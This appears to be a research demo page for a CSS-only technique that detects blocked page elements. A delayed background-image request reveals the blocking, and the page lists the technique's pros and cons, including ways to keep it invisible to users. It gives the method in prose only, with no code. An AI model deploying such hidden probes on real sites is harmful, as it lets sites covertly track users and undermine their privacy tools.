This page is designed to test the CSS animation attack. The attack waits for 1s using CSS animation before loading the signal image as background image. If the element is blocked, the browser should never send the request for the background image.
Attack Pros
This attack does not require any script. All scripts present in this
demo are strictly to help visualize the attack: One script connects a
service worker to act like the adversary server, and other scripts
helps with visualizing the attack parameters for the viewer.
This attack can be stealthy. At this moment, even while not trying to
hide the images, many images we load are originally single pixels and
don't show up. Click this button to hide/show the attack boxes:
We make the attack boxes invisible by reducing the height to 0 and
allowing no events to pass through. This way, the attack can be hidden
from the user.
The attack works even if JavaScript is disabled.
The attack is fast and does not require user interaction
The attack works correctly even if the unblocked URL does not exist. The browser still displays something which triggers the background image request after 1s.
Attack Cons
The attack is restricted to generic rules.
The attack does not work for Safari where they still load the image even if the element is not displayed.
